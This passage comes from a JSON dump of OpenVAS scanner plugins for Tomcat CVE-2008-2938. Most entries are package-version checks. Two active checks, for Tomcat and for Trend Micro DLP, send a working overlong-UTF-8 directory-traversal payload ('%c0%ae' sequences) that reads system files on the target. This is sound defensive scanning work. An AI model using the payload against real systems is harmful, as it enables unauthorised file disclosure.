script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-2938\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES9: Security update for Tomcat\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-jakarta-tomcat-connectors\", rpm:\"apache-jakarta-tomcat-connectors~5.0.19~29.16\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:40:10", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tomcat5\n tomcat5-admin-webapps\n tomcat5-webapps\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for Tomcat 5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065854", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065854", "sourceData": "#\n#VID slesp2-tomcat5-5539\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Tomcat 5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tomcat5\n tomcat5-admin-webapps\n tomcat5-webapps\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65854\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-2938\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES10: Security update for Tomcat 5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.0.30~27.30\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.0.30~27.30\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.0.30~27.30\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:40:18", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-jakarta-tomcat-connectors\n apache2-jakarta-tomcat-connectors\n jakarta-tomcat\n jakarta-tomcat-doc\n jakarta-tomcat-examples\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5035120 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for Tomcat", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065122", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065122", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5035120.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Tomcat\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-jakarta-tomcat-connectors\n apache2-jakarta-tomcat-connectors\n jakarta-tomcat\n jakarta-tomcat-doc\n jakarta-tomcat-examples\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5035120 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65122\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-2938\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES9: Security update for Tomcat\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-jakarta-tomcat-connectors\", rpm:\"apache-jakarta-tomcat-connectors~5.0.19~29.16\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-05-12T17:32:44", "description": "Trend Micro Data Loss Prevention is prone to a directory-traversal\n vulnerability because it fails to sufficiently sanitize user-supplied input.", "cvss3": {}, "published": "2011-06-14T00:00:00", "type": "openvas", "title": "Trend Micro Data Loss Prevention Directory Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Trend Micro Data Loss Prevention Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:trend_micro:data_loss_prevention\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103182\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2008-2938\"); # nb: The bug on the product is caused by an vuln in Apache Tomcat, thus the related Tomcat CVE here.\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-14 13:57:36 +0200 (Tue, 14 Jun 2011)\");\n script_bugtraq_id(48225);\n script_name(\"Trend Micro Data Loss Prevention Directory Traversal Vulnerability\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_trend_micro_data_loss_prevention_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8443);\n script_mandatory_keys(\"trendmicro/datalossprevention/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/48225\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17388/\");\n script_xref(name:\"URL\", value:\"http://us.trendmicro.com/us/products/enterprise/data-loss-prevention/index.html\");\n\n script_tag(name:\"summary\", value:\"Trend Micro Data Loss Prevention is prone to a directory-traversal\n vulnerability because it fails to sufficiently sanitize user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker could exploit this vulnerability using directory-\n traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may\n result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.\");\n\n script_tag(name:\"affected\", value:\"Trend Micro Data Loss Prevention 5.5 is vulnerable. Other versions may\n also be affected.\");\n\n script_tag(name:\"insight\", value:\"Trend Micro Data Loss Prevention is shipping a vulnerable Apache Tomcat\n version affected by a directory-traversal vulnerability registered with the CVE-2008-2938.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\n since the disclosure of this vulnerability. Likely none will be provided anymore.\n General solution options are to upgrade to a newer release, disable respective features,\n remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port, service:\"www\" ) ) exit( 0 );\nif( dir == \"/\" ) dir = \"\";\n\nfiles = traversal_files();\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n\n url = string( dir, \"//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/\" + file );\n\n if( http_vuln_check( port:port, url:url, pattern:pattern ) ) {\n report = http_report_vuln_url( url:url, port:port );\n security_message(port:port, data:url );\n }\n}\n\nexit( 0 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-21T21:26:26", "description": "Apache Tomcat is prone to a directory-traversal\n vulnerability because it fails to sufficiently sanitize user-supplied input.", "cvss3": {}, "published": "2018-10-22T00:00:00", "type": "openvas", "title": "Apache Tomcat 'UTF-8' Directory Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2020-07-06T00:00:00", "id": "OPENVAS:1361412562310108476", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108476", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat 'UTF-8' Directory Traversal Vulnerability\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108476\");\n script_version(\"2020-07-06T08:42:50+0000\");\n script_cve_id(\"CVE-2008-2938\");\n script_bugtraq_id(30633);\n script_tag(name:\"last_modification\", value:\"2020-07-06 08:42:50 +0000 (Mon, 06 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-22 15:32:08 +0200 (Mon, 22 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Apache Tomcat 'UTF-8' Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"apache/tomcat/http/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/30633\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/6229/\");\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/archive/1/499926\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat is prone to a directory-traversal\n vulnerability because it fails to sufficiently sanitize user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker could exploit this vulnerability using directory-\n traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may\n result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.\");\n\n script_tag(name:\"affected\", value:'Apache Tomcat versions before 4.1.39, 5.x before 5.5.27 and 6.x before 6.0.18 are vulnerable.\");\n\n script_tag(name:\"insight\", value:\"Originally reported as a Tomcat vulnerability the root cause of this issue is that\n the JVM does not correctly decode UTF-8 encoded URLs to UTF-8. This exposes a directory traversal vulnerability when\n the connector uses URIEncoding=\"UTF-8\". This directory traversal is limited to the docBase of the web application.\n\n If a context is configured with allowLinking=\"true\" then the directory traversal vulnerability is extended to the\n entire file system of the host server.\n\n It should also be noted that setting useBodyEncodingForURI=\"true\" has the same effect as setting URIEncoding=\"UTF-8\"\n when processing requests with bodies encoded with UTF-8.\n\n Although the root cause was quickly identified as a JVM issue and that it affected multiple JVMs from multiple vendors,\n it was decided to report this as a Tomcat vulnerability until such time as the JVM vendors provided updates to resolve\n this issue. For further information on the status of this issue for your JVM, contact your JVM vendor.');\n\n script_tag(name:\"solution\", value:\"Update Apache Tomcat to version 4.1.39, 5.5.27 or 6.0.18 or later which includes\n a workaround that protects against this and any similar character encoding issues that may still exist in the JVM.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nfiles = traversal_files();\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n\n url = string( dir, \"//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/\" + file );\n\n if( http_vuln_check( port:port, url:url, pattern:pattern ) ) {\n report = http_report_vuln_url( url:url, port:port );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-26T08:56:11", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tomcat5\n tomcat5-admin-webapps\n tomcat5-webapps\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for Tomcat 5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65854", "href": "http://plugins.openvas.org/nasl.php?oid=65854", "sourceData": "#\n#VID slesp2-tomcat5-5539\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Tomcat 5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tomcat5\n tomcat5-admin-webapps\n tomcat5-webapps\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65854);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-2938\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES10: Security update for Tomcat 5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.0.30~27.30\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.0.30~27.30\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.0.30~27.30\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-03-14T19:00:43", "description": "Oracle Linux Local Security Checks ELSA-2008-0648", "cvss3": {}, "published": "2015-10-08T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0648", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310122558", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122558", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122558\");\n script_version(\"2020-03-13T10:06:41+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:47:58 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 10:06:41 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0648\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0648 - tomcat security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0648\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0648.html\");\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-common-lib\", rpm:\"tomcat5-common-lib~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper\", rpm:\"tomcat5-jasper~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-javadoc\", rpm:\"tomcat5-jasper-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp-2.0-api\", rpm:\"tomcat5-jsp-2.0-api~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp-2.0-api-javadoc\", rpm:\"tomcat5-jsp-2.0-api-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-server-lib\", rpm:\"tomcat5-server-lib~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet-2.4-api\", rpm:\"tomcat5-servlet-2.4-api~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet-2.4-api-javadoc\", rpm:\"tomcat5-servlet-2.4-api-javadoc~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.5.23~0jpp.7.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-25T10:56:34", "description": "Check for the Version of tomcat5", "cvss3": {}, "published": "2009-02-17T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat5 FEDORA-2008-8113", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:860209", "href": "http://plugins.openvas.org/nasl.php?oid=860209", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat5 FEDORA-2008-8113\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 